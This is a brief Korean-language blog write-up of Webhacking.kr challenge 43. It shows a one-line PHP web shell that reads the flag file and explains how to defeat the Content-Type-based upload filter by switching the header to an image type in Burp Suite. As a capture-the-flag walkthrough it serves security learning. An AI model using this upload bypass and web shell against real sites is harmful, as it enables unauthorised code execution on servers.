[webhacking.kr] 43번 문제 풀이[PHP]

최대 1 분 소요

💡 Webhacking.kr challenge(old) 43번 문제에 대한 풀이입니다.

문제

image

php 파일을 올려서 웹쉘을 실행 시키면 됩니다.

문제 풀이

우선 웹쉘 파일은 다음과 같이 작성했습니다.

# test.php
<?php
system("cat /flag");
?>

그리고 해당 파일을 업로드 하면 다음과 같이 필터링 됩니다

image

필터링이 확장자 기반 필터링인지, 아니면 Content-type 기반 필터링인지 확인해 본 결과 Content-type 기반 필터링 이었습니다. 이미지 파일은 정상적으로 업로드 되기 때문에 파일을 업로드 할때 burp suite로 content-type만 이미지로 변경해 주면 됩니다.

image

image

해당 경로로 접근 해보면 다음과 같이 php파일이 실행되며 플래그를 획득할 수 있습니다.

image

댓글남기기